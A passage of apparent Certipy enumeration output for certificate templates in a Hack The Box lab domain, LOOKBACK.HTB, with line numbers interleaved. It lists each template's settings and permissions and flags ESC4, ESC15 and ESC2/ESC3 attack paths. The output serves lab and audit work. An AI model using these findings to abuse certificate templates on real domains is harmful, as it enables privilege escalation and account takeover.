    Certificate Name Flag               : EnrolleeSuppliesSubject
815
    Private Key Flag                    : ExportableKey
816
    Requires Manager Approval           : False
817
    Requires Key Archival               : False
818
    Authorized Signatures Required      : 0
819
    Schema Version                      : 1
820
    Validity Period                     : 5 years
821
    Renewal Period                      : 6 weeks
822
    Minimum RSA Key Length              : 2048
823
    Template Created                    : 2025-10-19T13:52:34+00:00
824
    Template Last Modified              : 2025-10-19T13:52:34+00:00
825
    Permissions
826
      Enrollment Permissions
827
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
828
                                          LOOKBACK.HTB\Enterprise Admins
829
      Object Control Permissions
830
        Owner                           : LOOKBACK.HTB\Enterprise Admins
831
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
832
                                          LOOKBACK.HTB\Enterprise Admins
833
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
834
                                          LOOKBACK.HTB\Enterprise Admins
835
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
836
                                          LOOKBACK.HTB\Enterprise Admins
837
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
838
                                          LOOKBACK.HTB\Enterprise Admins
839
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
840
    [!] Vulnerabilities
841
      ESC4                              : Template is owned by user.
842
  19
843
    Template Name                       : WebServer
844
    Display Name                        : Web Server
845
    Certificate Authorities             : lookback-DC01-CA
846
    Enabled                             : True
847
    Client Authentication               : False
848
    Enrollment Agent                    : False
849
    Any Purpose                         : False
850
    Enrollee Supplies Subject           : True
851
    Certificate Name Flag               : EnrolleeSuppliesSubject
852
    Extended Key Usage                  : Server Authentication
853
    Requires Manager Approval           : False
854
    Requires Key Archival               : False
855
    Authorized Signatures Required      : 0
856
    Schema Version                      : 1
857
    Validity Period                     : 2 years
858
    Renewal Period                      : 6 weeks
859
    Minimum RSA Key Length              : 2048
860
    Template Created                    : 2025-10-19T13:52:34+00:00
861
    Template Last Modified              : 2025-10-19T13:52:34+00:00
862
    Permissions
863
      Enrollment Permissions
864
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
865
                                          LOOKBACK.HTB\Enterprise Admins
866
      Object Control Permissions
867
        Owner                           : LOOKBACK.HTB\Enterprise Admins
868
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
869
                                          LOOKBACK.HTB\Enterprise Admins
870
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
871
                                          LOOKBACK.HTB\Enterprise Admins
872
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
873
                                          LOOKBACK.HTB\Enterprise Admins
874
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
875
                                          LOOKBACK.HTB\Enterprise Admins
876
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
877
                                          LOOKBACK.HTB\Enterprise Admins
878
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
879
    [!] Vulnerabilities
880
      ESC15                             : Enrollee supplies subject and schema version is 1.
881
      ESC4                              : Template is owned by user.
882
    [*] Remarks
883
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
884
  20
885
    Template Name                       : DomainController
886
    Display Name                        : Domain Controller
887
    Certificate Authorities             : lookback-DC01-CA
888
    Enabled                             : True
889
    Client Authentication               : True
890
    Enrollment Agent                    : False
891
    Any Purpose                         : False
892
    Enrollee Supplies Subject           : False
893
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
894
                                          SubjectAltRequireDns
895
                                          SubjectRequireDnsAsCn
896
    Enrollment Flag                     : IncludeSymmetricAlgorithms
897
                                          PublishToDs
898
                                          AutoEnrollment
899
    Extended Key Usage                  : Client Authentication
900
                                          Server Authentication
901
    Requires Manager Approval           : False
902
    Requires Key Archival               : False
903
    Authorized Signatures Required      : 0
904
    Schema Version                      : 1
905
    Validity Period                     : 1 year
906
    Renewal Period                      : 6 weeks
907
    Minimum RSA Key Length              : 2048
908
    Template Created                    : 2025-10-19T13:52:34+00:00
909
    Template Last Modified              : 2025-10-19T13:52:34+00:00
910
    Permissions
911
      Enrollment Permissions
912
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
913
                                          LOOKBACK.HTB\Domain Admins
914
                                          LOOKBACK.HTB\Domain Controllers
915
                                          LOOKBACK.HTB\Enterprise Admins
916
                                          LOOKBACK.HTB\Enterprise Domain Controllers
917
      Object Control Permissions
918
        Owner                           : LOOKBACK.HTB\Enterprise Admins
919
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
920
                                          LOOKBACK.HTB\Enterprise Admins
921
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
922
                                          LOOKBACK.HTB\Enterprise Admins
923
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
924
                                          LOOKBACK.HTB\Enterprise Admins
925
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
926
                                          LOOKBACK.HTB\Domain Controllers
927
                                          LOOKBACK.HTB\Enterprise Admins
928
                                          LOOKBACK.HTB\Enterprise Domain Controllers
929
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
930
                                          LOOKBACK.HTB\Enterprise Admins
931
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
932
    [!] Vulnerabilities
933
      ESC4                              : Template is owned by user.
934
    [*] Remarks
935
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
936
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
937
  21
938
    Template Name                       : Machine
939
    Display Name                        : Computer
940
    Certificate Authorities             : lookback-DC01-CA
941
    Enabled                             : True
942
    Client Authentication               : True
943
    Enrollment Agent                    : False
944
    Any Purpose                         : False
945
    Enrollee Supplies Subject           : False
946
    Certificate Name Flag               : SubjectAltRequireDns
947
                                          SubjectRequireDnsAsCn
948
    Enrollment Flag                     : AutoEnrollment
949
    Extended Key Usage                  : Client Authentication
950
                                          Server Authentication
951
    Requires Manager Approval           : False
952
    Requires Key Archival               : False
953
    Authorized Signatures Required      : 0
954
    Schema Version                      : 1
955
    Validity Period                     : 1 year
956
    Renewal Period                      : 6 weeks
957
    Minimum RSA Key Length              : 2048
958
    Template Created                    : 2025-10-19T13:52:34+00:00
959
    Template Last Modified              : 2025-10-19T13:52:34+00:00
960
    Permissions
961
      Enrollment Permissions
962
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
963
                                          LOOKBACK.HTB\Domain Computers
964
                                          LOOKBACK.HTB\Enterprise Admins
965
      Object Control Permissions
966
        Owner                           : LOOKBACK.HTB\Enterprise Admins
967
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
968
                                          LOOKBACK.HTB\Enterprise Admins
969
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
970
                                          LOOKBACK.HTB\Enterprise Admins
971
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
972
                                          LOOKBACK.HTB\Enterprise Admins
973
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
974
                                          LOOKBACK.HTB\Domain Computers
975
                                          LOOKBACK.HTB\Enterprise Admins
976
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
977
                                          LOOKBACK.HTB\Domain Computers
978
                                          LOOKBACK.HTB\Enterprise Admins
979
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
980
    [!] Vulnerabilities
981
      ESC4                              : Template is owned by user.
982
    [*] Remarks
983
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
984
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
985
  22
986
    Template Name                       : MachineEnrollmentAgent
987
    Display Name                        : Enrollment Agent (Computer)
988
    Enabled                             : False
989
    Client Authentication               : False
990
    Enrollment Agent                    : True
991
    Any Purpose                         : False
992
    Enrollee Supplies Subject           : False
993
    Certificate Name Flag               : SubjectAltRequireDns
994
                                          SubjectRequireDnsAsCn
995
    Enrollment Flag                     : AutoEnrollment
996
    Extended Key Usage                  : Certificate Request Agent
997
    Requires Manager Approval           : False
998
    Requires Key Archival               : False
999
    Authorized Signatures Required      : 0
1000
    Schema Version                      : 1
1001
    Validity Period                     : 2 years
1002
    Renewal Period                      : 6 weeks
1003
    Minimum RSA Key Length              : 2048
1004
    Template Created                    : 2025-10-19T13:52:34+00:00
1005
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1006
    Permissions
1007
      Enrollment Permissions
1008
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1009
                                          LOOKBACK.HTB\Enterprise Admins
1010
      Object Control Permissions
1011
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1012
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1013
                                          LOOKBACK.HTB\Enterprise Admins
1014
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1015
                                          LOOKBACK.HTB\Enterprise Admins
1016
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1017
                                          LOOKBACK.HTB\Enterprise Admins
1018
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1019
                                          LOOKBACK.HTB\Enterprise Admins
1020
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1021
    [!] Vulnerabilities
1022
      ESC4                              : Template is owned by user.
1023
  23
1024
    Template Name                       : EnrollmentAgentOffline
1025
    Display Name                        : Exchange Enrollment Agent (Offline request)
1026
    Enabled                             : False
1027
    Client Authentication               : False
1028
    Enrollment Agent                    : True
1029
    Any Purpose                         : False
1030
    Enrollee Supplies Subject           : True
1031
    Certificate Name Flag               : EnrolleeSuppliesSubject
1032
    Extended Key Usage                  : Certificate Request Agent
1033
    Requires Manager Approval           : False
1034
    Requires Key Archival               : False
1035
    Authorized Signatures Required      : 0
1036
    Schema Version                      : 1
1037
    Validity Period                     : 2 years
1038
    Renewal Period                      : 6 weeks
1039
    Minimum RSA Key Length              : 2048
1040
    Template Created                    : 2025-10-19T13:52:34+00:00
1041
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1042
    Permissions
1043
      Enrollment Permissions
1044
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1045
                                          LOOKBACK.HTB\Enterprise Admins
1046
      Object Control Permissions
1047
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1048
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1049
                                          LOOKBACK.HTB\Enterprise Admins
1050
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1051
                                          LOOKBACK.HTB\Enterprise Admins
1052
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1053
                                          LOOKBACK.HTB\Enterprise Admins
1054
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1055
                                          LOOKBACK.HTB\Enterprise Admins
1056
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1057
    [!] Vulnerabilities
1058
      ESC4                              : Template is owned by user.
1059
  24
1060
    Template Name                       : EnrollmentAgent
1061
    Display Name                        : Enrollment Agent
1062
    Enabled                             : False
1063
    Client Authentication               : False
1064
    Enrollment Agent                    : True
1065
    Any Purpose                         : False
1066
    Enrollee Supplies Subject           : False
1067
    Certificate Name Flag               : SubjectAltRequireUpn
1068
                                          SubjectRequireDirectoryPath
1069
    Enrollment Flag                     : AutoEnrollment
1070
    Extended Key Usage                  : Certificate Request Agent
1071
    Requires Manager Approval           : False
1072
    Requires Key Archival               : False
1073
    Authorized Signatures Required      : 0
1074
    Schema Version                      : 1
1075
    Validity Period                     : 2 years
1076
    Renewal Period                      : 6 weeks
1077
    Minimum RSA Key Length              : 2048
1078
    Template Created                    : 2025-10-19T13:52:34+00:00
1079
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1080
    Permissions
1081
      Enrollment Permissions
1082
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1083
                                          LOOKBACK.HTB\Enterprise Admins
1084
      Object Control Permissions
1085
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1086
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1087
                                          LOOKBACK.HTB\Enterprise Admins
1088
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1089
                                          LOOKBACK.HTB\Enterprise Admins
1090
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1091
                                          LOOKBACK.HTB\Enterprise Admins
1092
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1093
                                          LOOKBACK.HTB\Enterprise Admins
1094
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1095
    [!] Vulnerabilities
1096
      ESC4                              : Template is owned by user.
1097
  25
1098
    Template Name                       : CTLSigning
1099
    Display Name                        : Trust List Signing
1100
    Enabled                             : False
1101
    Client Authentication               : False
1102
    Enrollment Agent                    : False
1103
    Any Purpose                         : False
1104
    Enrollee Supplies Subject           : False
1105
    Certificate Name Flag               : SubjectAltRequireUpn
1106
                                          SubjectRequireDirectoryPath
1107
    Enrollment Flag                     : AutoEnrollment
1108
    Extended Key Usage                  : Microsoft Trust List Signing
1109
    Requires Manager Approval           : False
1110
    Requires Key Archival               : False
1111
    Authorized Signatures Required      : 0
1112
    Schema Version                      : 1
1113
    Validity Period                     : 1 year
1114
    Renewal Period                      : 6 weeks
1115
    Minimum RSA Key Length              : 2048
1116
    Template Created                    : 2025-10-19T13:52:34+00:00
1117
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1118
    Permissions
1119
      Enrollment Permissions
1120
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1121
                                          LOOKBACK.HTB\Enterprise Admins
1122
      Object Control Permissions
1123
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1124
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1125
                                          LOOKBACK.HTB\Enterprise Admins
1126
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1127
                                          LOOKBACK.HTB\Enterprise Admins
1128
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1129
                                          LOOKBACK.HTB\Enterprise Admins
1130
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1131
                                          LOOKBACK.HTB\Enterprise Admins
1132
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1133
    [!] Vulnerabilities
1134
      ESC4                              : Template is owned by user.
1135
  26
1136
    Template Name                       : CodeSigning
1137
    Display Name                        : Code Signing
1138
    Enabled                             : False
1139
    Client Authentication               : False
1140
    Enrollment Agent                    : False
1141
    Any Purpose                         : False
1142
    Enrollee Supplies Subject           : False
1143
    Certificate Name Flag               : SubjectAltRequireUpn
1144
                                          SubjectRequireDirectoryPath
1145
    Enrollment Flag                     : AutoEnrollment
1146
    Extended Key Usage                  : Code Signing
1147
    Requires Manager Approval           : False
1148
    Requires Key Archival               : False
1149
    Authorized Signatures Required      : 0
1150
    Schema Version                      : 1
1151
    Validity Period                     : 1 year
1152
    Renewal Period                      : 6 weeks
1153
    Minimum RSA Key Length              : 2048
1154
    Template Created                    : 2025-10-19T13:52:34+00:00
1155
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1156
    Permissions
1157
      Enrollment Permissions
1158
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1159
                                          LOOKBACK.HTB\Enterprise Admins
1160
      Object Control Permissions
1161
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1162
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1163
                                          LOOKBACK.HTB\Enterprise Admins
1164
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1165
                                          LOOKBACK.HTB\Enterprise Admins
1166
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1167
                                          LOOKBACK.HTB\Enterprise Admins
1168
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1169
                                          LOOKBACK.HTB\Enterprise Admins
1170
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1171
    [!] Vulnerabilities
1172
      ESC4                              : Template is owned by user.
1173
  27
1174
    Template Name                       : EFSRecovery
1175
    Display Name                        : EFS Recovery Agent
1176
    Certificate Authorities             : lookback-DC01-CA
1177
    Enabled                             : True
1178
    Client Authentication               : False
1179
    Enrollment Agent                    : False
1180
    Any Purpose                         : False
1181
    Enrollee Supplies Subject           : False
1182
    Certificate Name Flag               : SubjectAltRequireUpn
1183
                                          SubjectRequireDirectoryPath
1184
    Enrollment Flag                     : IncludeSymmetricAlgorithms
1185
                                          AutoEnrollment
1186
    Private Key Flag                    : ExportableKey
1187
    Extended Key Usage                  : File Recovery
1188
    Requires Manager Approval           : False
1189
    Requires Key Archival               : False
1190
    Authorized Signatures Required      : 0
1191
    Schema Version                      : 1
1192
    Validity Period                     : 5 years
1193
    Renewal Period                      : 6 weeks
1194
    Minimum RSA Key Length              : 2048
1195
    Template Created                    : 2025-10-19T13:52:34+00:00
1196
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1197
    Permissions
1198
      Enrollment Permissions
1199
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1200
                                          LOOKBACK.HTB\Enterprise Admins
1201
      Object Control Permissions
1202
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1203
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1204
                                          LOOKBACK.HTB\Enterprise Admins
1205
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1206
                                          LOOKBACK.HTB\Enterprise Admins
1207
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1208
                                          LOOKBACK.HTB\Enterprise Admins
1209
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1210
                                          LOOKBACK.HTB\Enterprise Admins
1211
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
1212
                                          LOOKBACK.HTB\Enterprise Admins
1213
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1214
    [!] Vulnerabilities
1215
      ESC4                              : Template is owned by user.
1216
  28
1217
    Template Name                       : Administrator
1218
    Display Name                        : Administrator
1219
    Certificate Authorities             : lookback-DC01-CA
1220
    Enabled                             : True
1221
    Client Authentication               : True
1222
    Enrollment Agent                    : False
1223
    Any Purpose                         : False
1224
    Enrollee Supplies Subject           : False
1225
    Certificate Name Flag               : SubjectAltRequireUpn
1226
                                          SubjectAltRequireEmail
1227
                                          SubjectRequireEmail
1228
                                          SubjectRequireDirectoryPath
1229
    Enrollment Flag                     : IncludeSymmetricAlgorithms
1230
                                          PublishToDs
1231
                                          AutoEnrollment
1232
    Private Key Flag                    : ExportableKey
1233
    Extended Key Usage                  : Microsoft Trust List Signing
1234
                                          Encrypting File System
1235
                                          Secure Email
1236
                                          Client Authentication
1237
    Requires Manager Approval           : False
1238
    Requires Key Archival               : False
1239
    Authorized Signatures Required      : 0
1240
    Schema Version                      : 1
1241
    Validity Period                     : 1 year
1242
    Renewal Period                      : 6 weeks
1243
    Minimum RSA Key Length              : 2048
1244
    Template Created                    : 2025-10-19T13:52:34+00:00
1245
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1246
    Permissions
1247
      Enrollment Permissions
1248
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1249
                                          LOOKBACK.HTB\Enterprise Admins
1250
      Object Control Permissions
1251
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1252
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1253
                                          LOOKBACK.HTB\Enterprise Admins
1254
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1255
                                          LOOKBACK.HTB\Enterprise Admins
1256
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1257
                                          LOOKBACK.HTB\Enterprise Admins
1258
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1259
                                          LOOKBACK.HTB\Enterprise Admins
1260
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
1261
                                          LOOKBACK.HTB\Enterprise Admins
1262
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1263
    [!] Vulnerabilities
1264
      ESC4                              : Template is owned by user.
1265
    [*] Remarks
1266
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
1267
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
1268
  29
1269
    Template Name                       : EFS
1270
    Display Name                        : Basic EFS
1271
    Certificate Authorities             : lookback-DC01-CA
1272
    Enabled                             : True
1273
    Client Authentication               : False
1274
    Enrollment Agent                    : False
1275
    Any Purpose                         : False
1276
    Enrollee Supplies Subject           : False
1277
    Certificate Name Flag               : SubjectAltRequireUpn
1278
                                          SubjectRequireDirectoryPath
1279
    Enrollment Flag                     : IncludeSymmetricAlgorithms
1280
                                          PublishToDs
1281
                                          AutoEnrollment
1282
    Private Key Flag                    : ExportableKey
1283
    Extended Key Usage                  : Encrypting File System
1284
    Requires Manager Approval           : False
1285
    Requires Key Archival               : False
1286
    Authorized Signatures Required      : 0
1287
    Schema Version                      : 1
1288
    Validity Period                     : 1 year
1289
    Renewal Period                      : 6 weeks
1290
    Minimum RSA Key Length              : 2048
1291
    Template Created                    : 2025-10-19T13:52:34+00:00
1292
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1293
    Permissions
1294
      Enrollment Permissions
1295
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1296
                                          LOOKBACK.HTB\Domain Users
1297
                                          LOOKBACK.HTB\Enterprise Admins
1298
      Object Control Permissions
1299
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1300
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1301
                                          LOOKBACK.HTB\Enterprise Admins
1302
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1303
                                          LOOKBACK.HTB\Enterprise Admins
1304
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1305
                                          LOOKBACK.HTB\Enterprise Admins
1306
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1307
                                          LOOKBACK.HTB\Domain Users
1308
                                          LOOKBACK.HTB\Enterprise Admins
1309
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
1310
                                          LOOKBACK.HTB\Domain Users
1311
                                          LOOKBACK.HTB\Enterprise Admins
1312
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1313
    [!] Vulnerabilities
1314
      ESC4                              : Template is owned by user.
1315
  30
1316
    Template Name                       : SmartcardLogon
1317
    Display Name                        : Smartcard Logon
1318
    Enabled                             : False
1319
    Client Authentication               : True
1320
    Enrollment Agent                    : False
1321
    Any Purpose                         : False
1322
    Enrollee Supplies Subject           : False
1323
    Certificate Name Flag               : SubjectAltRequireUpn
1324
                                          SubjectRequireDirectoryPath
1325
    Extended Key Usage                  : Client Authentication
1326
                                          Smart Card Logon
1327
    Requires Manager Approval           : False
1328
    Requires Key Archival               : False
1329
    Authorized Signatures Required      : 0
1330
    Schema Version                      : 1
1331
    Validity Period                     : 1 year
1332
    Renewal Period                      : 6 weeks
1333
    Minimum RSA Key Length              : 2048
1334
    Template Created                    : 2025-10-19T13:52:34+00:00
1335
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1336
    Permissions
1337
      Enrollment Permissions
1338
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1339
                                          LOOKBACK.HTB\Enterprise Admins
1340
      Object Control Permissions
1341
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1342
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1343
                                          LOOKBACK.HTB\Enterprise Admins
1344
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1345
                                          LOOKBACK.HTB\Enterprise Admins
1346
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1347
                                          LOOKBACK.HTB\Enterprise Admins
1348
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1349
                                          LOOKBACK.HTB\Enterprise Admins
1350
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1351
    [!] Vulnerabilities
1352
      ESC4                              : Template is owned by user.
1353
  31
1354
    Template Name                       : ClientAuth
1355
    Display Name                        : Authenticated Session
1356
    Enabled                             : False
1357
    Client Authentication               : True
1358
    Enrollment Agent                    : False
1359
    Any Purpose                         : False
1360
    Enrollee Supplies Subject           : False
1361
    Certificate Name Flag               : SubjectAltRequireUpn
1362
                                          SubjectRequireDirectoryPath
1363
    Enrollment Flag                     : AutoEnrollment
1364
    Extended Key Usage                  : Client Authentication
1365
    Requires Manager Approval           : False
1366
    Requires Key Archival               : False
1367
    Authorized Signatures Required      : 0
1368
    Schema Version                      : 1
1369
    Validity Period                     : 1 year
1370
    Renewal Period                      : 6 weeks
1371
    Minimum RSA Key Length              : 2048
1372
    Template Created                    : 2025-10-19T13:52:34+00:00
1373
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1374
    Permissions
1375
      Enrollment Permissions
1376
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1377
                                          LOOKBACK.HTB\Domain Users
1378
                                          LOOKBACK.HTB\Enterprise Admins
1379
      Object Control Permissions
1380
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1381
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1382
                                          LOOKBACK.HTB\Enterprise Admins
1383
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1384
                                          LOOKBACK.HTB\Enterprise Admins
1385
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1386
                                          LOOKBACK.HTB\Enterprise Admins
1387
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1388
                                          LOOKBACK.HTB\Domain Users
1389
                                          LOOKBACK.HTB\Enterprise Admins
1390
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1391
    [!] Vulnerabilities
1392
      ESC4                              : Template is owned by user.
1393
  32
1394
    Template Name                       : SmartcardUser
1395
    Display Name                        : Smartcard User
1396
    Enabled                             : False
1397
    Client Authentication               : True
1398
    Enrollment Agent                    : False
1399
    Any Purpose                         : False
1400
    Enrollee Supplies Subject           : False
1401
    Certificate Name Flag               : SubjectAltRequireUpn
1402
                                          SubjectAltRequireEmail
1403
                                          SubjectRequireEmail
1404
                                          SubjectRequireDirectoryPath
1405
    Enrollment Flag                     : IncludeSymmetricAlgorithms
1406
                                          PublishToDs
1407
    Extended Key Usage                  : Secure Email
1408
                                          Client Authentication
1409
                                          Smart Card Logon
1410
    Requires Manager Approval           : False
1411
    Requires Key Archival               : False
1412
    Authorized Signatures Required      : 0
1413
    Schema Version                      : 1
1414
    Validity Period                     : 1 year
1415
    Renewal Period                      : 6 weeks
1416
    Minimum RSA Key Length              : 2048
1417
    Template Created                    : 2025-10-19T13:52:34+00:00
1418
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1419
    Permissions
1420
      Enrollment Permissions
1421
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1422
                                          LOOKBACK.HTB\Enterprise Admins
1423
      Object Control Permissions
1424
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1425
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1426
                                          LOOKBACK.HTB\Enterprise Admins
1427
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1428
                                          LOOKBACK.HTB\Enterprise Admins
1429
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1430
                                          LOOKBACK.HTB\Enterprise Admins
1431
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1432
                                          LOOKBACK.HTB\Enterprise Admins
1433
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1434
    [!] Vulnerabilities
1435
      ESC4                              : Template is owned by user.
1436
  33
1437
    Template Name                       : UserSignature
1438
    Display Name                        : User Signature Only
1439
    Enabled                             : False
1440
    Client Authentication               : True
1441
    Enrollment Agent                    : False
1442
    Any Purpose                         : False
1443
    Enrollee Supplies Subject           : False
1444
    Certificate Name Flag               : SubjectAltRequireUpn
1445
                                          SubjectAltRequireEmail
1446
                                          SubjectRequireEmail
1447
                                          SubjectRequireDirectoryPath
1448
    Enrollment Flag                     : AutoEnrollment
1449
    Extended Key Usage                  : Secure Email
1450
                                          Client Authentication
1451
    Requires Manager Approval           : False
1452
    Requires Key Archival               : False
1453
    Authorized Signatures Required      : 0
1454
    Schema Version                      : 1
1455
    Validity Period                     : 1 year
1456
    Renewal Period                      : 6 weeks
1457
    Minimum RSA Key Length              : 2048
1458
    Template Created                    : 2025-10-19T13:52:34+00:00
1459
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1460
    Permissions
1461
      Enrollment Permissions
1462
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1463
                                          LOOKBACK.HTB\Domain Users
1464
                                          LOOKBACK.HTB\Enterprise Admins
1465
      Object Control Permissions
1466
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1467
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1468
                                          LOOKBACK.HTB\Enterprise Admins
1469
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1470
                                          LOOKBACK.HTB\Enterprise Admins
1471
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1472
                                          LOOKBACK.HTB\Enterprise Admins
1473
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1474
                                          LOOKBACK.HTB\Domain Users
1475
                                          LOOKBACK.HTB\Enterprise Admins
1476
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1477
    [!] Vulnerabilities
1478
      ESC4                              : Template is owned by user.
1479
  34
1480
    Template Name                       : User
1481
    Display Name                        : User
1482
